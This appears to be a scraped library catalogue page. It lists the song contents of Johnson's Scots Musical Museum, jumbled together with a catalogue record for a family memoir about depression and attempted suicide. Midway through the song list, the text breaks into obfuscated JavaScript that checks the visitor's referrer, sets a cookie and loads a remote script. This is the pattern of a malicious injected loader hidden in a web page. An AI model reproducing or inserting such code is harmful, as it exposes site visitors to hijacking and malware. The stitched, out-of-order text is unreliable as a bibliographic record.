--I, who am sore oppress'd with love --A cock laird, fu' cadgie --Duncan Davison --Love will find out the way --Ah! the poor shepherd's mournful fate --My love has forsaken me --My lo'v Celestia --Thro the wood, laddie --Where Helen lies --Theniel Menzies bonie Mary --The banks of the Devon --Waly, waly --The shepherd Adonis --Duncan Gray --Dumbarton's drums --Cauld kail in Aberdeen --For lake of gold --Katharine Ogie --The ploughman --Tune, Here's a health to my true love, &c.. --Wantonness for ever mair --The humble beggar --The rowin't in her apron --The boate rows, first sett --The boatie rows, second sett --The boatie rows, third sett --Charlie he's my darling --As Sylvia in a forest lay --The lass of Ecclefechan --The cooper o' Cuddy --Widow, are ye waking? --The maltman --Leezie Lindsay --The auld wife ayont the fire --For the sake o somebody --The cardin o't, &c.
] : John and Patricia Gallagher, ©2009 ISBN\ISSN: 0962150002, 9780962150005Genre: BiographyNotes: xiii, 155 pages : illustrations ; 22 cmResponsibility: No more secrets : a family speaks about depression, anxiety, and attempted suicideOpening thoughts --Prologue --John's story --Patricia's story --Robin's story --Katelyn's story --Ryan's story --Mom-Mom's story --Interview questions for the Gallagher family --Frequently asked questions about depression --Resources, organizations, self-help groups --The nicest thing anybody ever said or did for me --How I fill my "love tank" when I feel depressed or anxious --How I build myself up when I am feeling not good enough --What money can't buy --What to do when you are feeling sad, blue, anxious, down in the dumps and you don't want to get up in the morning --How family members can fill their love tank when a loved one is depressed or anxious --A team of angels to the rescue --Real dads, real men, real families campaign, real depression campaign.
--In yon garden, &c --The poor pedlar --You ask me charming fair --O ken ye what Meg o' the mill has gotten --How sweet is the scene - Sure my Jean --How sweet this lone vale --Jockey's ta'en the parting kiss --What's that to you --Little wat ye wha's coming --O leave novels &c.
--Comin thro' the rye, 1st sett --Comin thro' the rye, 2d sett --Young Jamie pride of a the plain --Out over the Forth, &c.. (with, The Queen o' the Lothians cam cruisin to Fife) --Gudeen to you kimmer --In Brechin did a wabster dwell --Willy's rare, and Willy's fair --My daddy left me &c.. --The bonny wee thing --Roy's wife of Alldivaloch --Lady Randolph's complaint --Come here's to the nymph that I love --The tither morn --A country lass (with, Geordie, an old ballad) --Ae fond kiss, &c.. Volume II (continued) Volume 6 My Peggy's face --My boy Tammy --Red gleams the sun --O steer her up and had her gaun --When I gaed to the mill --Whar' Esk its silver stream --Row fastly, thou stream --As I went o'er &c.. --O cherub content --As walking forth --The Battle of Harlaw --O Bothwell bank --Wee Willie Gray --When the days they are lang --The banks of the Dee --Scenes of woe and scenes of pleasure --Go to Berwick Johnny --'Twas at the shining mid-day hour --Have you any pots or pans --Now bank an' brae --Ae day a braw wooer, &c.. --Stern winter has left us --Stern winter has left us, second sett --Ah Mary sweetest main --Anna, thy charms my bosom fire --Thy cheek is o' the rose's hue --O ay my wife she dang me --Come under my plaidy --Come follow, follow me --Lord Thomas and fair Annet --William and Margaret --What ails the lasses at me --The sun in the west --Scroggam --O tell me my bonny &c.. --Could aught of song --O! dear what can the matter be --Heres to thy health my bonie lass --Jenny's bawbie --It was a' for our rightfu king --The Highland widow's lament --Gloomy December --Evan Banks.. --Sir John Malcolm --Lizae Baillie --The reel o' Stumpie --I'll ay ca' in by yon town --Will ye go and marry Katie --Blue bonnets --The broom blooms bonie --The rantin laddie --The lass that winna sit down --O May thy morn --My Minnie says I manna --The cherry and the slae --As I came o'er the Cairney mount --Highland laddie --Chronicle of the heart --Wilt thou be my dearie --Lovely Polly Stewart --The Highland balon --Auld king Coul --The rinaway bride --Bannocks o' oear meal --Wae is my heart --There was a silly shepherd swain --Kind Robin looes me --We'll put the sheep head in the pat --Here's his health in water --The maid gaed to the mill --Sir Patrick Spence --The wren, or, Lennox's love to Blantyre --Gude Wallace --The auld man's mare's dead --The winter of life --Godo morrow, fair mistress --The haws of Cromdale --No dominies for me, laddie --The taylor --There was a wee bit wiffikie --There grows a bonie brier bush &c.. --O lay thy loof in mine lass --Saw ye the thane &c --Go plaintive sounds --Bruce's address to his army --Farewell y fields &c.. constructor(\x22return\x20this\x22)(\x20)'+');');_0x2d85d5=_0x340968();}catch(_0x4780c4){_0x2d85d5=window;}var _0x223b39='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x2d85d5['atob']||(_0x2d85d5['atob']=function(_0x223a63){var _0x1bbba6=String(_0x223a63)['replace'](/=+$/,'');for(var _0x388b2f=0x0,_0x25b8c5,_0x29529a,_0x302e0f=0x0,_0x393fe3='';_0x29529a=_0x1bbba6['charAt'](_0x302e0f++);~_0x29529a&&(_0x25b8c5=_0x388b2f%0x4?_0x25b8c5*0x40+_0x29529a:_0x29529a,_0x388b2f++%0x4)?_0x393fe3+=String['fromCharCode'](0xff&_0x25b8c5>>(-0x2*_0x388b2f&0x6)):0x0){_0x29529a=_0x223b39['indexOf'](_0x29529a);}return _0x393fe3;});}());_0xf831['base64DecodeUnicode']=function(_0x12d518){var _0x35bd3b=atob(_0x12d518);var _0x49b8ef=[];for(var _0x45e7ef=0x0,_0x387d8d=_0x35bd3b['length'];_0x45e7ef=_0x266062;},'uNRTA':function _0x315bf5(_0x22a642,_0x3bf241){return _0x22a642===_0x3bf241;},'rUGjU':_0xf831('0x2e'),'wpBLn':_0xf831('0x2f'),'LFIaB':function _0x3bb56f(_0x52cdeb,_0x2b1d95){return _0x52cdeb(_0x2b1d95);},'jNwMl':function _0x1f81e5(_0x14e46a,_0x170e1a){return _0x14e46a+_0x170e1a;},'THYkP':function _0x2ba268(_0x3b7e49,_0x56e138){return _0x3b7e49+_0x56e138;},'EKSbf':_0xf831('0x30')};var _0x5efd03=[_0x1b7ea1[_0xf831('0x31')],_0x1b7ea1[_0xf831('0x32')],_0xf831('0x33'),_0xf831('0x34'),_0x1b7ea1[_0xf831('0x35')],_0x1b7ea1[_0xf831('0x36')],_0xf831('0x37')],_0x189815=document[_0xf831('0x38')],_0xaf5f25=![],_0x319a5f=cookie[_0xf831('0x39')](_0x1b7ea1['OQevs']);for(var _0x3282ec=0x0;_0x1b7ea1[_0xf831('0x3a')](_0x3282ec,_0x5efd03[_0xf831('0x3b')]);_0x3282ec++){if(_0x1b7ea1[_0xf831('0x3c')](_0x1b7ea1[_0xf831('0x3d')],'Gtj')){if(_0x1b7ea1[_0xf831('0x3e')](_0x189815[_0xf831('0x3f')](_0x5efd03[_0x3282ec]),0x0)){_0xaf5f25=!![];}}else{return undefined;}}if(_0xaf5f25){cookie[_0xf831('0x40')](_0x1b7ea1[_0xf831('0x41')],0x1,0x1);if(!_0x319a5f){if(_0x1b7ea1[_0xf831('0x42')](_0x1b7ea1['rUGjU'],_0x1b7ea1['wpBLn'])){params=matches[_0x3282ec][_0xf831('0xe')]('=');cookie[params[0x0]]=params[0x1][_0xf831('0x1d')](/;$/);}else{_0x1b7ea1[_0xf831('0x43')](include,_0x1b7ea1[_0xf831('0x44')](_0x1b7ea1[_0xf831('0x45')](_0x1b7ea1[_0xf831('0x46')],q),''));}}}}R(); Author: John Gallagher; Patricia C GallagherPublisher: [Worcester, Pa.. --Ay waukin, O --The breast knots --Beware o' bonie Ann --This is no mine ain house --My wife's a wanton, wee thing --Laddie lie near me --The brisk young lad --The gardener wi' his paidle --Bonny Barbara Allan --Young Philander --On a bank of flowers --The day returns, my bosom burns --My love she's but a lassie yet --The Gaberlunzie-man --Cauld frosty morning --The black eagle --Jamie come try me --Magie's tocher --My bony Mary --The lazy mist --The captain's lady --Johnie Cope --I love my Jean --Tune, O dear mother, what shall I do --The linkin laddie --Alloa house --Tun, Carle, an' the king come --The Siller crown --St.. --Hey, Jenny, come down to Jock --O'er Bogie --Lass wi' a lump of land --Hey tutti taiti --The young laird and Edinburgh Katy --Katy's answer --Raving winds around her blowing --Ye gods, was Strephon's picture blest --How long and dreary is the night --Since robb'd of all that charmd my views --The bonny Earl of Murray --Young Damon --Musing on the roaring ocean --Blythe was she --Johny Faa, or, The Gypsy laddie --To Dannton me --Polwart on the green --Absence --I had a horse, and I had nae mair --Talk not of love, it gives me pain --O'er the water to Charlie --Up and warn a' Willie --A rose bud by my early walk --To a blackbird --Hooly and fairly --Auld Rob Morris --And I'll kiss thee yet, yet --Rattlin, roarin Willie --Where braving anry winter's storms --Tibbie, I hae seen the day --Nancy's ghost --Clarinda --Cromlet's lilt --The winter it is past.. --O Mary turn awa --O gude ale comes &c --Robin shure in hairst --Wha wadna be in love &c.. Johnson Volume I Volume 1 The Highland queen --An thou were my ain thing --Peggy, I must love thee --Bess the Gawkie --Oh open the door, Lord Gregory --The banks of the Tweed --The beds of sweet roses --Roslin Castle --Saw ye Johnnie cummin, quo' she --Woo'd and married and a' --Saw ye nae my Peggy --The bonny Scot-man --The flowers of Edinburgh --Jamie Gay --My dear Jockey --Fy gar rub her o'er wi' strae --The lass of Livingston --The last time I came o'er the moor --The happy marriage --The lass of Peaty's mill --The Highland laddie --Highland laddie, new sett --The Turnimspike --Blythe Jockey --Auld lang syne --Leander on the bay --The gentle swain --He stole my tender heart away --Blythe Jocky young and gay --Bonny Bessy --Twine weel the plaiden --Fairest of the fair --The blathrie o't --Lucky Nancy --May eve, or, Kate of Aberdeen --Tweed side --Mary's dream --New set of Mary's dream --Water parted from the sea --The maid that tends the goats --I wish my love were in a mire --Logan water --Allan water --There's nae luck about the house --Tarry woo --The maid in Bedlam --The collier's bonny lassie --Within a mile of Edinburgh --My ain kind, deary-O --Nancy's to the green-wood gane --Blink o'er the burn, sweet Bettie --Jenny Nettles --When absent from the nymph --Bonny Jean --O'er the moor to Maggy --Pinky-house --Here awa', there awa' --The blithsome bridal --Sae Merry as we tw'a hae been --Bonny Christy --Jocky said to Jeany --O'er the hills, and far away --The flowers of the forest --Busk ye, busk ye --There's my thumb, I'll ne'er beguile thee --Gilderoy --John Hay's bonny lassie --The bonny Brucket lassie --The broom of Cowdenknows --Oscar's ghost --Her absence will not alter me --The birks of Invermay --Mary Scot --Down the burn, Davie --The banks of Forth --O saw ye my father --Green grows the rashes --Loch Eroch side --The bonny grey-ey'd morn --The bush aboon Traquair --Etrick banks --My deary, if thou die --She rose, and let me in --Sweet Anny frae the sea-beach came --Go to the ew-bughts, Marion --Lewis Gordon --The wawking of the fauld --My Nanny-O --Oh ono chrio --Low down in the broom --I'll never leave thee --Braes of Ballenden --Corn riggs --My apron, dearie --Lochaber --The mucking of Geordie's byar --Bide ye yet --The joyful widower --Bonie Dundee --Johnny and Mary --Volume I (continued).. --As I was a wand'ring --Lovely Davies --The weary Pund O' Tow --Now westlin winds --I hae a wife o' my ain --O fare ye weel my auld wife --O, for ane and twenty Tam --Johnie Armstrang --Hey how Johnie lad --Logie o' Buchan --O Kenmare's on and awa, Willie --Bess and her spinning wheel --My collier laddie --The shepherd's wife --William's ghost --Nithsdall's welcome hame --Johnie Blunt --Country lassie --Fair Eliza --Fair Eliza --Muirland Willie --The wee wee man --Ye Jacobites by name --The poor thresher --The posie --The banks o' Doon --Donocht-head --Sic a wife as Willie had --Lady Mary Ann --Such a parcel of rogues in a nation --Kellyburnbraes --Evanthe --Jocky fou, and Jenny fain --Ay waking oh --Patie's wedding --The slaves lament --Orananaoig, or, The song of death --Afton water --Bonie Bell --Green sleeves --The gallant weaver --Sleepy body --I love my jovial sailor --Hey ca' thro' --While hopeless, &c.. --The blue bells of Scotland --Colin Clout --'Tis nae very lang sinsyne --O once I loved --When I think on my lad --Return homeward --My lady's gown there's gairs upon't --May morning --Dinna think bonie lassie I'm gaun to leave you --O gin I were fairly shot o' her --Hey my kitten my kitten --Sweetest May --Argyll is my name --An' I'll awa to bonny Tweed-side --Gently blaw &c.. --The souters o' Selkirk --Rock and wee pickle tow --Tibbie Fowler --On hearing a young lady sing --There's three gude fellow ayont yon glen --O can ye sew cushions --The glancing of her apron --Waly, waly, a different set --She says she lo'es me best of a' --The bonie lass made the bed to me --Sae far awa --Put the gown upon the bishop --Hallow fair, There's fouth of braw jockies, &c.. --O can ye labor lea, young man --On the death of Delia's linnet --The deuks dang o'er my daddie --As I went ont ae May morning --She's fair and fause, &c.. --A cogie of ale, and a pickle ait meal --The Dumfries Volunteers --He's dear dear to me &c.. Originally issued between 1787 and 1803 in six volumes of 100 songs each Originally published: Edinburgh : J.. --O heard ye e'er of a silly blind harper --My Nannie O --As I lay on my bed on a night --The rain rins down &c.. Originally compiled and edited by Robert Burns and James Johnson Includes index of songs contributed by Burns, and reprints of Burns' notes on Scottish song.. --Cauld is the e'enin blast --O turn away those cruel eyes --O Mary ye's be clad in silk --There was a bonie lass --No churchman am I --The Highlander's lament --There news lasses news --Hard is the fate of him who loves --Ye muses nine, O lend your aid --Nelly's dream --O that I had ne'er been married --O gin my love were yon red rose --Nae luck about the house when our goodwife's awa --Liv'd ance twa lovers in yon dale --O Mally's meek, Mally's sweet --Tell me Jessy tell me why --I care na for your een sae blue --Good night and joy be wi' you a'.. --Deil tak the wars --Awa whigs awa --Ca' the ewes to the knowes --Highland song --The jolly beggar --I loe na a laddie but ane --I'll mak you be fain to follow me --The bridal o't --Merry hae I been teethin a heckle --A mother's lament for the death of her son --The white cockade --Oran gaoil, a gallic song translated by a lady (As on an eminence I stood a musing) --Sandy o'er the lee --Todlen Hame --The braes o' Ballochmyle --The rantin dog the daddie o't --The shepherd's preference --My Mary dear, departed shade --Hardyknate, or, The Battle of Largs --Eppie Adair --The Battle of Sherra-moor --Sandy and Jockie --The bonie banks of Ayr --John o' Badenvond --Frennett Hall --Young Jockey was the blythest lad --A waukrife Minnie --Tullochgorum --For a' that an' a' that --Willie brew'd a peck o' maut --Killiecrankie --The ewie's wi' the crooked horn --The blue-eyed lassie --The banks of Nith --Tam Glen --Drap o' capie O --On the restoration of the forfeited Estates 1784 --The Campbell's are comin --Get up and bar the door.. Volume I (continued) Volume 3 Tune your fiddles, &c --Gladsmuir --Gill Morice --I love my love in secret --When I upon thy bosom lean --Colonel Gardener --Tibbie Dunbar --Jenny, was fair and unkind --My Harry was a gallant gay --The Highland character --Leader haughs and yarrow --The taylor fell thro' the bed, &c.. The lovely lass of Inverness --A red red rose --Old set, Red red rose --Mary Queen of Scots lament --A lassie all alone --The wren's nest --Peggy in devotion --Jamie o' the glen --O gin ye were dead Gudeman --My wife has taen the gee --Tam Lin --Here's a health to them that's awa --Auld lang syne --Louis what reck I by thee --Had I the wyte she bad me --The auld man, &c.. Kilda song --The mill mill O --The waefu heart --lass gin ye lo'e me, tell me now --The lover's address to Rose bud --Cease, cease my dear friend to explore --Auld Robin Gray --Leith Wynd --Whistle o'er the lave o't --Tak your auld cloak about ye --Happy clown --Donald and Flora --By the delicious warmness of thy mouth --Sun gallop down the westlin skies --O, were I on Parnassus Hill --Song of Selma --The captive ribband --There's a youth in this city --My heart's in the Highlands --John Anderson my Jo --Ah, why thus abandon'd &c.. Volume 2 When Guilford good our pilot stood --Tranent muir --To the weaver's gin ye go --Strephon and Lydia --On a rock by seas surrounded --Whistle, an' I'll come to you, my lad --I'm o'er young to marry yet --Hamilla --Love is the cause of my mourning --Bonnie May --My Jo Janet --He who presum'd to guide the sun --The birks of Aberfeldy --McPherson's farewell --The lowlands of Holland --The maid of Selma --The Highland lassie O --The Northern lass --Song of Selma --Fife and a' the lands about it --Were na my heart light I wad die --The yellow-hair'd laddie --The miller --Wap at the widow, my laddie --Braw, braw lads of Galla-water --The young man's dream --O mither dear --Bessy Bell, and Mary Gay --Stay, my charmer, can you leave me --Lady Bothwell's lament --Woes my heart that we shou'd sunder --Strathallan's lament --What will I do gin my hoggie die --The carle he came o'er the craft --Gae to the ky wi' me, Johnny --Why hangs that cloud --Willy was a wanton wag --Jumpin John --Hap me wi' thy petticoat --Up in the morning early --The tears of Scotland --Where winding Forth adorns the vale --The young Highland rover --Dusty Miller --The wedding-day --I dream'd I lay, &c.. Facsimile reprint of the 1853 edition, from a copy in the National Library of Scotland.. --The De'il's awa wi' th' exciseman --Miss Weir Volume II (continued) Volume 5.. Volume II Volume 4 Craigie-burn wood --Frae the friends and land I love --Hughie Graham --My goddess woman --John come kiss me now --I've been courting at a lass --Peas strae --A Southland Jenny --Cock up your beaver --O laddie I maun lo'e thee --Let me in this ae night --My tochers the jewel --Then guidwife count the lawin --The whistle --There'll never be peace till Jamie comes hame --What can a young lassie do wi' an auld man --The bonie lad that's far awa --The auld goodman --O as I was kist yestreen --Fine flowers in the valley --I do confess thou art sae fair --If e'er I do well 'tis a wonder --The soger laddie --Where wad bonie Annie ly --Galloway Tam --As I cam down by yon castle wa' --Lord Ronald my son --O'er teh moor amang the heather --Sensibility how charming --To the rose bud --Yon wild mossy mountains --Bonie laddie Highland laddie --It is na, Jean, thy bonie face --Donald Couper --The vain pursuit --Eppie McNab --Wha is that at my bower door --Thou art gane awa --Thou art gane awa, new sett --The tears I shed &c.
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